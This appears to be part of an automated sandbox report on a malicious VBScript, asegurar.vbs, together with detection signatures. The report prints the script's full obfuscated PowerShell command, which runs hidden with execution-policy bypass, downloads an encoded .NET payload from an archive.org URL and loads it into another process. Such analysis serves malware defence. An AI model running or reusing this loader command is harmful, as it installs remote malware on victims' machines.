abnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
parent_process	wscript.exe	martian_process	powershell -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Creates a suspicious Powershell process (9 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

asegurar.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All